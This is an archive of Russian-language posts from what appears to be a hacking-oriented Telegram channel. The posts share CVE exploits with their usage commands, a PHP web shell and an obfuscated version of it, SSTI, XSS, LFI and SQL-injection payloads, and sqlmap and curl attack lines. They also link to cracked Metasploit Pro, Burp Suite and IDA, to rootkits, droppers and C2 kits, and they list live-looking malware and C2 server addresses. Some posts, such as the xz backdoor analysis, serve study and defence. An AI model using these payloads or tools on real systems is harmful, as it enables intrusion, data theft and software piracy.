навыкам кибербезопасности через серию практических заданий. • Codeby Games Уникальная платформа для специалистов информационной безопасности и программистов, желающих прокачивать свои навыки в области кибербезопасности, выполняя задания на захват флага (CTF).• Hackerhub Предоставляет бесплатные виртуальные машины для улучшения ваших навыков информационной безопасности.LH | Новости | Курсы | Мемы#рекомендация#рекомендации
2024-04-25 05:05:40
CVE-2024-4040 CrushFTP RCE*CrushFTP во всех версиях до 10.7.1 и 11.1.0 на всех платформах позволяет неаутентифицированным удаленным атакующим читать файлы из файловой системы за пределами песочницы VFS, обходить аутентификацию для получения административного доступа и выполнять удаленное выполнение кода*Usage:python exploit.py -u https://example.com -p /etc/passwd*Exploit#rce #ftp Images
2024-04-24 13:32:02
Рекомендуем подписаться на новый блог @mirea*Все о web уязвимостях, парсинге, внутренней инфры (Active Directory и т.д), авторские статьи, заметки, утилиты.*Все статьи написаны на личном опыте, не несут теоретический характер, только то, что может встретиться на периметре🛡🔒—> ПОДПИСАТЬСЯ <—🔍 Images
2024-04-23 12:40:29
CVE-2024-27199 TeamCity server*CVE облегчает создание несанкционированной учетной записи администратора в обход ошибок 403 в домене.*usage:python RCity.py -t http://teamcity.com:8111 --verbose*Exploit#teamcity Images
2024-04-22 18:41:43
А был ли мальчик rootkit ?*Тут на Blackhat/2024 который asia, ресерчер Or Yair порылся в закромах windows.И пока он шел из из DOS в NT, набрел на интересные и казалось бы безопасные вещи, эксплуатация которых приводит к рутКированию хоста и выдают себя за файлы, каталоги и процессы.*тут крутой красивый PDF с blackhat*а тут тоже самое но + видеодемонстрации#windows #vuln #rootkit Images
2024-04-22 10:11:52
CVE-2024-21111 VirtualBox (Local Privilege Escalation) exploit#virtualbox #windows #lpe Images
2024-04-22 09:43:02
MetaSploit PRO + crackтам readme есть с пошагомvirustotal ясно говорит что это hackTool и вообще адварь, ну а что вы хотели от кряка ?))))На свой страх и риск#metasploitPRO
2024-04-22 08:03:40
CVE-2024-20356Jailbreaking a Cisco appliance to run DOOM*Сам POC exploit*Ну как сам DOOM запустил на циске пододеяльнике почитать тут#IDDQD #IDKFA Images
2024-04-15 20:50:27
Так, по ПОТОа я как могу сотрудничаю с акк правительстенными организациями и и местнными региональными, слава горподи что успели забрать наших людей с семьей, мы ПОЛНОСТЬЮ берем на себя финансовоый воспрос по размещению ВСЕХ люледей*контакты ЗВОНИТЬ ТУТ ЖЕЕсли вам совсем плхохо и все проебано, звоните МНЕ, попытаюсь помочь 99187490947
2024-04-14 07:00:03
Бесконтрольное делегирование и повышение привилегий в домене !😜Образовательные мультики по утрам воскресенья !кофе, сырник.#чипИдэйл
2024-04-14 05:29:59
Сегодня воскресеньедевочкам печеньеа мальчишкам дуракамтолстой палкой по бокамиBurp Suite Professional EditionВерсия 2024.3.1.1 Full Activated + Extensions#burp
2024-04-13 10:31:38
CVE-2024-3400 Palo Alto GlobalProtect VPN (0-Day)*Тех детали - тут хорошо расписано*Сэмпл бэкдора - скачать тут (UPSTYLE Backdoor - update.py)*Аналитика от PaloAlto + адрсеса С2 серверов - можно глянуть тут#paloalto #vpn #0day Images
2024-04-12 18:49:45
Telegram Desktop RCE* "pywz" против "pyzw"Чьто ? руки тряслись чтоли ?)))*link#teleжga Images
2024-04-12 14:23:15
Юзать хэшы для поиска малвари для Linux — давно бесполезноПростой скрипт который самомодифицируется и будет дергать изменения криптографических хэшей при каждом запуске.#!/bin/shecho "Viva la Proxy Bar!"sha1sum $0echo "#$RANDOM" >> $0sha1sum $0Ну и в тему ЭЛИТНАЯ команда: 😂echo -ne '\x0'#LOL #linux #hash Images
2024-04-12 11:11:10
CVE-2024-21378 Microsoft Outlook Remote Code Execution*Описание работы внутри файла*POC exploit#outlook #exploit Images
2024-04-11 07:56:06
рубрика "мало кто помнит или 35+"*У TheBat в апреле вышла версия 11.1Такие дела.... 😏#tooOLD #theBAT Images
2024-04-11 05:42:20
ExploitGSM - Дополнительный exploit для ядра 6.5*ExploitGSM_5_15_to_6_1 - первый сплоитExploitGSM_6_5 - дополнительный сплоитOffsetGenerator - генератор смещенияwriteup.docx - что и как работает*dowmload#linux #exploit #kernel Images
2024-04-10 19:37:02
DDOS flooder 193.93.248.103забавный такой 😜 Images Images
2024-04-10 13:37:09
CVE-2023-36047* Дырка в службе usermanager, которая копировала файлы из каталога, управляемого пользователем, что приводило к Elevation of Privilege. ЗаБагФиксили только часть операции копирования, а операция чтения все еще выполняелась в контексте NT AUTHORITY\\SYSTEM. Эту уязвимость можно использовать для получения SAM /SYSTEM/SECURITY из теневой копии. Патч уже есть и уязвимость отслеживается как CVE-2024-21447*Exploit#windows #eop
2024-04-09 20:31:47
CVE-2024-2879 LayerSlider плагин для WordPress*Версии LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection*Недостаточне экранирование позволяет добавлять дополнительные SQL-запросы к уже существующим, как итог = можно использовать для извлечения конфиденциальной информации из базы данных.*POC usage:sqlmap "https:://OLOLO.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T or sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T#wordpress
2024-04-09 13:40:46
CVE-2024-27316 Атака на http/2*Подробности уязвимости*Конкретно CVE-2024-27316 влияет на другие CVE:CVE-2024-30255 (untested)CVE-2024-31309 (untested)CVE-2024-28182 (untested) CVE-2024-2653 (untested)CVE-2024-27919 (untested)*Usage:go build./cve-2024-27316 -t 127.0.0.1:80 -p http -i 8192./cve-2024-27316 -t 127.0.0.1:443 -p https -i 8192*POC exploit Images
2024-04-08 19:54:44
CVE-2024-29269*Маршрутизаторы TELESQUARE TLR-2005KSH уязвимы для неаутентифицированных команд*Хантер показывает что есть 3307 девайсов*POC exploit Images
2024-04-08 15:16:45
Вся боль сетевиков и cisco 2960 😜*бегом ставить Packet Tracer Tracket Pacer#CCNA #song #lol
2024-04-07 07:31:14
CVE-2024-3273*D-Link NAS версии:DNS-320L Version 1.11, Version 1.03.0904.2013, Version 1.01.0702.2013DNS-325 Version 1.01DNS-327L Version 1.09, Version 1.00.0409.2013DNS-340L Version 1.08Exploit + Tool#dlink #exploit #NAS Images
2024-04-07 07:13:14
Как работает бэкдор XZUtils SSHD*Образовательные мультики по утрам воскресенья, берите кофе с сырником, усаживайтесь
2024-04-07 06:57:13
Pentes LAB - SCCM (red team tactics)*Часть 0х0 Часть 0х1 - Recon and PXEЧасть 0х2 - Low userЧасть 0х3 - Admin User*#redteam #sccm Images
2024-04-06 20:38:09
C2 Cloud веб-инфраструктура C2*Anywhere Access: Reach the C2 Cloud from any location.Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.*download #CC Images
2024-04-06 20:23:53
CVE-2024-30850*chaos-rat RCE*exploit
2024-04-06 11:05:37
Jasmin ransomware web panel path traversal*Деанон операторов ransom панели Jasmin и сброс ключей дешифрованияexploit Images
2024-04-04 20:56:11
как реагирует SOC на фолс позитив )))
2024-04-04 18:10:55
Практическая скрытая беспроводная однонаправленная связь в среде IEEE 802.11*Хардварщики как всегда, нет им покоя, в целом молодцы ! Хорошо расписано !*ВОУ ВОУ почитать*#802.11 #тихоБудь Images
2024-04-02 19:25:12
OpenBSD IPv6 Multicast Forwarding Cache sysctl kernel heap overflow*exploit#openBSD #NFS
2024-04-02 13:22:26
xzbot (CVE-2024-3094)*Рассужденияhoneypot+ Тестовый эксплоит для xz backdoor*Подобрать#xz #backdoor Images
2024-04-02 08:01:27
Cloudflare Bypass Script*download
2024-04-01 06:34:40
С праздником 😝#SOC #1april Images
2024-03-31 10:21:29
xz-vulnerable-honeypot *SSH-ханипот с бэкдором XZ. CVE-2024-3094*download#xz #docker #honeypot
2024-03-30 06:11:43
Backdoor в xz/liblzma (атака на цепочку поставок)part 4К врачу за мной будете.Делать то что ? Ну во первых нужно проверить версию либыxz -Vесли версия liblzma 5.6.0 или liblzma 5.6.1 - начинайте как я жрать таблетки (в arch linux прилетело), откатываемся до безопасной версии liblzma 5.4.1А вот в последнем обновлении debian таки хорошая версия, безопасная. Images Images
2024-03-30 05:32:44
Backdoor в xz/liblzma (атака на цепочку поставок)part 3Ну и кто добавил вредонос ?*А ноги растут из 2021 года, когда был создан акк JiaT75 на гите.JiaT75 делает коммит, заменяя Safe_fprint небезопасным вариантом, делая еще одну потенциальную дырку.*В 2022 году добавляет патч к xz и появляется еще один коммитер Jigar Kumar. Вместе они парят голову Лассе Колину (разраб xz) и патч мерджится.Ребятам стали доверять и выдали креды к репозиторию.*В 2023 контактная почта в Google oss-fuzz меняется на JiaT75, а не на Лассе Коллина.И коммиты понеслись....*В 2024 году ребята меняю URL tukaani.org/xz/ на xz.tukaani.org/xz-utils/ который далее уводит на гит JiaT75. Отжали проект. Далее добавляются последнии коммиты уже с бэкдором и шлюхами
2024-03-30 05:04:58
Backdoor в xz/liblzma (атака на цепочку поставок)part 2Часть AWK сценария декодирования #xz #backdoor реализует модифицированный алгоритм RC4.Нет ключа, состояние RC4 инициализируется напрямуюКлючевой поток применяется с помощью ADD, а не XOR. Images
2024-03-30 04:45:54
Backdoor в xz/liblzma (атака на цепочку поставок)*Утры.Вчера ближе к ночи в сети начала вируситься картинка (скрин 1), подпись к картинке гласила - "объектный файл с бэкдором. добавлены некоторые «тестовые» данные в исходное дерево, которые unxz'ются и (dd) вырезаются определенным образом, которые передаются в деобфускатор, написанный на awk-скрипте, и результат снова получает unxz'".Стало интересно, это часть чего? Явно же кусок не полный.В итоге выяснилось что это часть бэкдора для xz/liblzmaОткуда ноги выросли ? А у людей начал ssh тормозить, а точнее долго подключаться.Сам ssh xz/liblzma не использует, за то его используют всякие systemD, например для отправки логов.Отравленные версии xz тут:https://github.com/tukaani-project/xz/releases/tag/v5.6.1А обновленный код бэкдора тутhttps://github.com/tukaani-project/xz/commit/6e636819e8f070330d835fce46289a3ff72a7b89*Lzma — крайне распространенный продукт, который также юзается в очень многих прошивках Score 10 из 10#supplyCHAIN #xz Images Images
2024-03-29 20:30:50
рубрика "перекрестись"*объектный файл с бэкдором, добавлены некоторые «тестовые» данные в исходное дерево, которые unxz'ются и (dd) вырезаются определенным образом, которые передаются в деобфускатор, написанный на awk-скрипте, и результат снова получает unxz'#ebatь Images
2024-03-29 19:32:48
CVE-2024-0582 *io_uring LPE linux*Если нужно описание, гуглите идентичную дырку за номером CVE-2023-2598#linux #lpe #ubuntu
2024-03-29 04:47:15
CVE-2024-28085 - Смешная дырка в Linux 😜*Дырке 11 лет, дырка есть в обновлении которое вышло 27 марта 2024 года.Дырка проверена на Ubuntu 22.04 LTS и Debian 12.5Но есть ньюанс, нужно уже быть на сервере.*В общем почитайте, поддельные sudo запросы*POC #linux #sudo Images
2024-03-28 20:33:54
CVE-2023-6546 - GSM Multiplexing Race Condition*сплойт предназначенный для Ubuntu 18.04+20.04 LTS/Centos 8/RHEL 8 и позволяющий получить root-права посредством выполнения произвольного кода ядра в системах SMP.*exploit#linux #lpe Images
2024-03-28 14:35:44
None
2024-03-28 14:30:11
Acunetix version 24.2windows + linux февраль 2024
2024-03-28 08:08:31
APT28 - OCEANMAP Backdoor & Exploring(Exploring its C2 Server Artifacts)*Analyzing*YARA#apt28 Images
2024-03-27 10:25:08
Cobalt Strike: Generating beacons for Linux*Ну вдруг вы не знали#cobalt #linux Images
2024-03-27 09:11:21
evolution of security Images
2024-03-27 05:18:57
CVE-2024-1086 Linux LPE *Универсальный эксплойт для повышения локальных привилегий , работающий на большинстве ядер Linux между версиями 5.14 и 6.6, Debian, Ubuntu.*download#linux #lpe
2024-03-27 05:05:42
Exploiting CVE-2023-3390 in Linux kernel*Сначала с гита этот спич удалили (схерали ?) пару дней назад, но мы написали ресерчеру INSU YUN, и чувак любезно поделился, а мы делимся с вами, не успев проснуться. КОФЕ !!!*Читаем - One shot, Triple kill#linux #0day #1day Images
2024-03-26 14:44:16
CVE-2023-42931 Apple macOS LPE*Affected:MacOS Sonoma before 14.2MacOS Ventura before 13.6.3MacOS Monterey before 12.7.2*Весь путь тут#macos Images
2024-03-26 13:24:16
Ransom Ryukhttp://95.217.135[.190пасип 😏 Images
2024-03-26 09:09:28
Рубрика "отсыпь скринов"Делаем скриншот из UEFI
2024-03-26 07:53:31
CVE-2024-20767 Adobe ColdFusion*Уязвимость чтения файловой системы#adobe
2024-03-26 07:45:58
Хороший разбор малвари NanoCore\nancrat *Цепочка: Phishing | Fake Link > ZIP/DOC > Script/Loader > NanoCore > Persistence > Injection > Info Collection > C&C*READ Images
2024-03-25 20:26:48
Remote code execution в FreeBSD и OpenBSD Дырка в NFS*Опа, даже у титанов бывают проблемы Images
2024-03-24 18:57:17
Свежий проект dropperПроект, создает вредоносный дропер с поддержкой макросов Office для боковой загрузки DLL и встраивающий его в файл Lnk для обхода MOTW (функция защиты устройства от вредоносных файлов, загруженных из сети).Download#dropper #dll
2024-03-24 14:17:54
CVE-2024-28116 Grav CMSexploit authenticated SSTI+RCEPOC
2024-03-24 13:27:35
Где деньги Лебовски ?*NoMoney — это инструмент для сбора информации, который объединяет fofa, Zoomeye , censys, платформу Intergraph от Qi'anxin и 360quake. Как врут видно из названия, возможности этого инструмента на вышеперечисленных платформах бесплатны. *За бесплатным сыром сюда#freecheese #lol Images
2024-03-23 12:47:37
Linux 😊C=$(tput cols);L=$(tput lines);while :;do x=$(($RANDOM%$C));y=$(($RANDOM%$L));printf "\033[${y};${x}fF";done
2024-03-23 12:34:55
Exploiting the libwebp Vulnerability, Part 2: Diving into Chrome Blink Images
2024-03-23 08:44:04
хммм, ну оке Images
2024-03-23 06:26:57
CVE-2023-36424Windows Kernel Pool (clfs.sys) Corruption Privilege Escalation exploit Images
2024-03-15 13:09:42
CVE-2023-6817Linux kernel: use-after-free in nf_tables*ДЫрка в ядре Linux nf_tables, приводит к DoS или LPE.Патч в версии linux 6.7-rc5Скомпилять POC можно так:gcc -o poc poc.c -lnftnl -lmnl
2024-03-14 17:01:21
На ночь 3 минуты*exploits.club - Weekly Newsletter 12*Link Images
2024-03-14 12:37:41
%3C/script%20%3EилиmitsecXSS%22%3E%3Cinput%20%00%20onControl%20hello%20oninput=confirm(1)%20x%3E#xss Images
2024-03-14 11:57:30
CVE-2024-25153: Remote Code ExecutionFortra FileCatalyst*POC* Images
2024-03-08 23:11:38
Дамы инфобеза, всех с дн0м )))) 8 ))) Images
2024-03-07 07:31:22
Linux Privilege Escalation Cheatsheetпыщь Images
2024-03-07 06:32:50
CVE-2024-1403*Progress OpenEdge Authentication Bypass *exploit proof of concept
2024-03-06 18:15:59
Уязвимость DataCube3POC сочетает в себе CVE-2024-25830 (неправильный контроль доступа) для извлечения паролей root и CVE-2024-25832 (неограниченная загрузка файлов) для развертывания reverse shell*POC
2024-03-06 08:02:20
Bypass UAC Images
2024-03-06 07:00:13
XieBroC2C&CСлили в открытый доступ все, кроме кода командного сервера. download#C2 Images
2024-03-06 06:41:24
Server Side Template Injection Payload List{7*7}*{7*7}{{7*7}}[[7*7]]${7*7}@(7*7)<?=7*7?><%= 7*7 %>${= 7*7}{{= 7*7}}${{7*7}}#{7*7}[=7*7]если отдает 49 - цель уязвима#SSTI
2024-03-05 20:52:16
Рубрика интересноВозможна удаленная атака в стиле Stuxnet с использованием Web-Based PLC Malware: ResearchersLink#stuxnet Images
2024-03-05 14:09:08
CVE-2024-27198обход аутентификации с использованием уязвимости альтернативного пути в JetBrains TeamCity Server*#jets
2024-03-05 13:50:09
CVE-2024-21338*Годная статьяLazarus и руткит FudModule: за пределами BYOVD с нулевым днем ​​от администратора до ядра*
2024-02-25 05:06:22
None Images
2024-02-25 05:06:21
Ночью LockBit восстановил сервера, и выдал обращение
2024-02-24 05:26:56
Banshee*Windows x64 Kernel Rootkit (Experimental)*Умеет:- Kill processes- Change protection levels- Elevate any process token to SYSTEM- Enumerating and erasing kernel callbacks- Protecting the driver file- Hide Process by PID*TODO list - обещает интересное расширение функционала*download win_rootkit#win #rootkit
2024-02-23 21:36:13
CVE-2024-1651 exploit (RCE)*Дырка в Torrentpier v2.4.1, приложение уязвимо к небезопасной десериализации, поэтому - позволяет выполнять произвольные команды на сервере.#exploit #rce #linux
2024-02-23 21:24:12
SSH-Snake Tool for ....lulz*Это идеальное сочетание лени, глупости и божьей искры )))То есть чуваки написали утилиту на базе ssh для КАРТОГРАФИРОВАНИЯ локалки, бегает с закрытыми ключами и бед не знает.Ну не удивительно что черные шляпы мигом взяли на вооружение 😆Правильное название должно быть ssh-wormТДН во все поля )*SSH-Snake *Почитать#worm #ssh Images
2024-02-21 20:54:10
ChatBot для WordPress*SQL-инъекция через параметр $strid в версии до 4.8.9 включительно*ТЫКНУТЬpython3 sqlmap.py -u 'http://OLOLO.ru:80/wp-admin/admin-ajax.php' --data='action=wpbo_search_response&name=test&keyword=test&strid=1' --level 4 --risk 3 --dbms mysql --banner -p stridа я споть
2024-02-21 13:58:28
CVE-2024-25600 wordpress Exploit (RCE)*Дыра в плагине Bricks Builder*requirements:alive_progressbs4prompt_toolkitrequestsrich*#RCE #wordpress
2024-02-21 09:13:58
ScreenConnect POC* Обход аутентификации для добавления нового пользователя-администратора в ConnectWise ScreenConnect.*Usage:python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!*
2024-02-21 09:10:14
Ну понеслась
2024-02-21 08:29:39
Linux — это теперь и CNAРубрика - Интересное, проект ядра Linux был принят в качестве органа нумерации CVE (CNA) для выявления уязвимостей, обнаруженных в Linux.Теперь еще и их мониторитьПочитать тут#vuln #linux #security Images
2024-02-21 04:58:43
Ждем exploit для ScreenConnect Images
2024-02-20 19:02:47
ALFA LOL teamhttp://34.101.157.124/bins/ Images
2024-02-20 13:26:04
Побег из VirtualBox 7.0.10ДЫрки в virtio-netПочитать можно про CVE-2023-22098, CVE-2023-22099, CVE-2023-22100*exploit#virtualbox #escape Images
2024-02-19 15:54:00
Все эти билайны и теле2 это только верхушка айсберга и перерастает в шпионский треш, да еще и очень быстро.Даже если просто переводить .md можно примерно прикинуть объемы затрагиваемых тем, структур, организаций и стран с их альянсами.Ноги выросли отсюда I-S00NВ общем китайский APT-подрядчик нормально так накинул на вентилятор, от iOS Spyware до физических имплантируемых устройств.В общем будет интересно, читаем вникаем дальше*Ну и да, кого в Китае расстреляютUPDATE: хороший разбор тут с переводами скринов на английский (читать снизу вверх за последние 19 часов)#APT
2024-02-19 14:12:36
В дампе поля:APT41 - коменты будут ?*GUIDABONENT_IDABONENT_NAMELOGINPASSWORDACCOUNT_USR_BLOCK ABONENT_BLOCKDEVICE_BLOCKQUESTION ANSWERACTIVE_DATEDEACTIVE_DATEPACKET_TYPETOWNDEVICESUBSCRIBER_IDADDRESS_ID* Images
2024-02-19 13:39:02
Beeline потёк Images
2024-02-19 08:33:08
BurpSuite PRO version 2024.1.1.1+BurpBountyPro_v2.8.0 ru+eng+manual
2024-02-19 05:24:09
KeyTrap in DNS (CVE-2023-50387)*Link Images
2024-02-18 03:44:31
Living off the False Positive*Полезное.Ну прям всем хорошо, blue team могут использовать для настройки своей логики обнаружения вторжений, а red team научиться сливаться с серой массой.LoFP Images
2024-02-16 12:01:02
CVE-2024-21413 Expect Script POC*Microsoft Outlook Remote Code Execution Vulnerability (through the preview panel) CVSS:3.1 9.8 / 8.5*Link
2024-02-15 19:12:57
Прощай NGINX*ESXI умер пару дней назадтеперь и NGINX умерГлав разраб форкнул проект и теперь будет FreeNginxПочитайте письмо, как эффективные манагеры в очередной раз все обосралиhttps://freenginx.org/pipermail/nginx/2024-February/000000.html*В AUR уже что то появилось#fuck Images
2024-02-14 18:43:19
Грязный BASHоднострочник для быстрого обнаружения XSS в файлах PHP*rg --no-heading "echo.*\\\$_GET" | grep "\.php:" | grep -v -e "(\$_GET" -e "( \$_GET" -e "esc_" -e "admin_url" -e "(int)" -e htmlentities
2024-02-13 14:33:34
CVE-2023-36845 и CVE-2023-36846Juniper Junos OS J-Web RCE*На все это дело есть и сплоит на питонено можно и в curlык*curl -kv "https ://OLOLO.com/about.php? PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"' Images
2024-02-13 08:29:19
Свежая техника обхода EDRКому лень читать всю статью то: техника основана на запуске малвари ДО загрузки библиотеки DLL EDR.Суть вот в чем, EDR должен внедрить свою DLL в каждый процесс, но если внедрять слишком рано - процесс крэшится, внедрять слишком поздно - так его уже малварь подчинила.Суммируем: нужно найти момент для загрузки малвари ЧУТЬ раньше, при инициализации процесса - тогда EDR в лохматой жопе.*Статья - Bypassing EDRs With EDR-PreloadingСорцы - EDR-Preloader#EDR #malware Images
2024-02-12 20:18:04
Windows Defender Detection Mitigation Bypass VulnerabilityWin LPEВ 2022 году hyp3rlinx рассказывал как можно обойти windows defender передав дополнительный путь при ссылке на mshtml, дырку пофиксили. НО, добавив пару запятых в старый трюк - и опять bypass. *то есть было и пофиксили:C:\sec>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666)магия запятой:C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)собака старая, трюки новые.CVE пока не имеет )#defender #bypass Images
2024-02-11 17:48:23
Bypassing SQL*payload:8%20or%207250%3d0725*для sqlmap:sqlmap -u 'http://OLOLO.com/anyfile.asp?id_test=8%20or%207250%3d07250' --dbs --random-agent ignore=500 - -code=200 -T tablename --columns -- no-cast*#sql #bypass
2024-02-11 05:35:32
Xbox ? PlayStation ? NoUbiquiti switch !
2024-02-10 08:03:40
В поисках malware инфраструктуры *Если вам интересно как ищут всякие opedir, или C&C со всякими cobalt-strike, havoc или малварь вроде dark comet, то есть интересная статья, в статье 11 примеров на базе censys.*Исходя из статьи, можно немного прикрыть свой C2 от любопытных глаз*Tracking Malware Infrastructure#malware #c2 Images
2024-02-10 07:34:10
Pwning the Domain: Credentialess/Username*Большой и подробный ман от 7 февраля 2024*read#redteam #win #pwn #cred Images
2024-02-09 14:13:38
LFI*Payload: ".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" Images
2024-02-08 12:23:21
внесем немного конкретики о пинах BitLocker Key retrieval on a Windows 11, Lenovo X1 Carbon Gen 11 via SPI Sniffing.То есть на задней стороне материнки, есть тестовые пады, секурненько )))*Да, это TPM 2.0*Ну и почитать TPM SNIFFING#bitlocker #sniff Images
2024-02-04 19:04:23
x4n4x securityтематы молодец ))))
2024-02-04 09:14:34
АДМИН проявись
2024-02-04 05:34:54
Утры, как сами? Кофе, ? Давай два?)))
2024-02-02 18:50:39
Lenovo X1 Carbon Bitlocker Key Sniffingкруто, 42.9 секунды
2024-02-01 10:04:18
CVE-2023-6246: Heap-based buffer overflow in the glibc's syslogPOC(exec -a "`printf '%0128000x' 1`" /usr/bin/su < /dev/null)всем сегфолта )))))
2024-02-01 06:38:59
Docker 4 сыра дыркиwriteup тута на видео видно как можно заюзать дырку в docker runc#docker #escape
2024-02-01 06:00:42
bypass XSS Cloudflare WAFEncoded Payload &#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;Clean Payload "><track/onerror='confirm`1`'>#CF #bypass
2024-01-31 18:35:48
Linux Kernel Exploitation (свежая версия)*1 часть - Getting started & BOF 2 часть - Exploiting race-condition + UAF 3 часть - Heap techniques#linux #kernel #hack Images
2024-01-31 18:30:59
LockBit 3.0 - ребят, напишите мне, я вам расскажу за репутационный риск менеджментесть пара мыслей#lockbit Images
2024-01-30 09:34:29
Рекомендуется к прочтениюИнтервью с yashechkaМои поздравления )))*#xman_series Images
2024-01-30 07:04:26
Наконец то была найдена АтлантидаНа легендарный остров-государство обманным путем вывозят Telegram, Steam, данные криптовалютных кошельков, данные браузера, а также пушнину и женщинРенТВ - call mehttp://5.42.64.32/login.php C2 Panel#cc #bot Images
2024-01-30 06:15:52
ARTToolkit*Интерактивная шпаргалка, содержащая полезный список наступательных инструментов безопасности и соответствующих им команд/полезных данных, которые можно использовать в redteam*Link Images
2024-01-30 04:40:50
CVE-2023-35636 Microsoft Outlook, связанная с раскрытием информации (утечка хеша пароля) — Expect Script POC*exploit#outlook Images
2024-01-23 06:02:33
Linux Privileges Escalation Techniques (Basic to Advanced) Series*Part 1: http://hacklido.com/blog/158Part 2: http://hacklido.com/blog/162Part 3: http://hacklido.com/blog/210Part 4: http://hacklido.com/blog/224Part 5: https://hacklido.com/blog/286 Images
2024-01-19 04:09:00
CVE-2023-7028 | Account-Take-Over Gitlab*usage:python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -t my.target@example.com#gitlab
2024-01-18 20:50:29
Cobalt-Strike-Profiles-for-EDR-Evasion+ SourcePoint is a C2 profile generator for Cobalt Strikedownload#cs Images
2024-01-18 12:33:13
#pic #linux Images Images
2023-12-15 14:09:01
Linux Red Team cat /home/redteam/1- Exploitation Techniques2 - Privilege Escalation Techniques3 - Persistence Techniques4 - Defense Evasion - Hiding Linux Processes5 - Defense Evasion - Rootkits#linux #learn #hack
2023-12-15 06:59:31
CVE-2023-49070 - Apache ofbizpre-auth RCE POC#apache Images
2023-12-15 06:53:46
CVE-2023-22524 CVSS: 9,6 Уязвимость в приложении Atlassian Companion для macOS (все версии до 2.0.0)*POC#jira
2023-12-14 17:27:03
#Xmas Images Images
2023-12-14 10:56:09
The Art Of Linux PersistenceDecember 13, 2023Про git backdoor прикольноREAD\download#linux #persist Images
2023-12-14 06:37:06
CVE-2023-6553 Exploit Плагин Backup Migration для WordPress , RCE до версии 1.3.7 включительно *exploit#wordpress #rce
2023-12-12 11:29:38
FUCK WAFОт Cloudflare до Imperva, Akamai, F5, Checkpoint, Fortinet#waf #bypass #payload #regexp
2023-12-12 07:50:28
А еще утекли сорцы\панельки\билдеры у Ermak и Hookbot#malware Images Images Images
2023-12-12 07:46:02
😁 lol#ransom Images
2023-12-11 10:52:46
BurpSuite PRO (version 2023.11.1.2) + +BurpBountyPro_v2.7.0#burp
2023-12-10 09:21:34
Концепция (PoC) атаки 5G NR на:смартфоны CPE-маршрутизаторыUSB-модемы5Ghoul — это семейство DoS-уязвимостей 5G на уровне реализации, затрагивающих мобильные платформы Qualcomm и MediaTek.+12 доступных эксплойтов* 5ghoul-5g-nr-attacks* Images
2023-12-09 20:11:51
Используем ssh-keygen для:- произвольного выполнения кода- повышения привилегий- перезаписи файловЗабавно (и закономерно) что вектор подходит как для *nix так и для win*Сам researchДополнительный researchlib2shell#ssh Images
2023-12-09 14:01:40
Shellcode Loader with memory evasion *Jomungand#win #shellcodes Images
2023-12-08 10:51:45
Stratosphere Linux IPSНу казалось бы IPS и IPS, бох с ним что на питоне, ведь есть Machine Learning Models.За то как его активно форсят на BlackHat Europe , BlackHat USA, BlackHat Asia, Hack In The Box, OpenAlt, Ekoparty (?)*DownLoad*#ips #ids #обхсс Images
2023-12-08 06:44:19
Курс по фишингу от SkillFARTory, + реальная возможность трудоустройства + диплом ВШЭ_птуlink Images
2023-12-07 20:51:45
чей ключ от домофона ? https://svn.python.org/www/trunk/advocacy.python.org/etc/server.pem#py Images
2023-12-07 18:29:51
RAThXXp:\\43X249X38x36/ Images
2023-12-05 19:18:30
Тут туса и SLAM интересныйПомните атаки Meltdown и Spectre (Intel, AMD, ARM, POWER) ? Ну так вот, трое пацанов взяли проц i9-13900k, ubuntu с ядром 6.3, сделали эмуляцию intel LAM (в ядре 6.4 Linear Address Masking (intel LAM) уже есть ) и используя наработки Spectre смогли прочитать память ядра.В общем этот вот intel LAM позволил создать в и без того дырявой процессорной архитектуре дополнительный канал слива памяти прямо в жирные лапкиSpectre + Intel LAM = SLAM*Почитать можно ТУТСкачать SLAM ТУТ#proc
2023-12-05 11:21:36
Погрузиться в методы использования руткитов режима ядра Windows (+ гипервизор)link#windows #rootkits #modules Images
2023-12-04 11:46:33
CVE-2023-49287TinyDir <= 1.2.5 Buffer overflowProof of concept (c 183 строки)
2023-12-03 09:14:15
вернуться в 2000е и задеть струны души за полсекунды 😜
2023-12-01 08:00:45
mini_PHP Payload*<?=`$_GET[0]`?><?=`$_POST[0]`?><?=`{$_REQUEST['_']}`?>*Usage : bashorg.com/path/to/shell.php?0=command*Obfuscation :<?=$_="";$_="'";$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>
2023-11-28 14:53:04
LOOOOLНашли до чего доебаться, еще и тикет открыли ))webshell exists in the project
2023-11-25 07:30:51
IDA_pro - 8.3 final release + keygen#IDApro
2023-11-24 19:06:49
Active Directory Canarieslink Images
2023-11-24 06:11:52
Надеюсь JOY CASINO Images
2023-11-23 19:19:04
CobaltStrike в Chrome installer с подписью от BreakPoint Software Inc*Strike config Images
2023-11-23 06:49:44
1 - учите питон2 - учите арабский3 - едете в германию работать программистом кассиром в макдач Images
2023-11-23 06:45:13
CVE-2023-49103DetailPOC_exploit (multi-thread)
2023-11-22 20:58:14
Мечтает ли товарищ майор об элетроТелеге ? Но не спеши погружаться в философские думы, мой юный друг !Ведь в нашей студии, прости хоспаде - Telegram ExplorerУ которого в описании ЖИР жирокъНу прям RSS на базе православной тележки.Но разговоры в сторону - немедленно выкатываем в продакшен !#Fu Images
2023-11-22 12:59:55
Интересная мультиварка
2023-11-21 12:53:46
Это на новый год ! Images
2023-11-21 10:24:39
HavocExploitПраздник у всех любителей фреймфорка Havoc ( post-exploitation command and control framework )*DOS_exploit*Usage:pip install -r requirements.txt./exploit.py -t teamserverip -p port#havoc Images
2023-11-21 05:22:11
Спешим читать свежий выпуск tmpOut 03 за ноябрь 2023 Images
2023-11-19 06:33:51
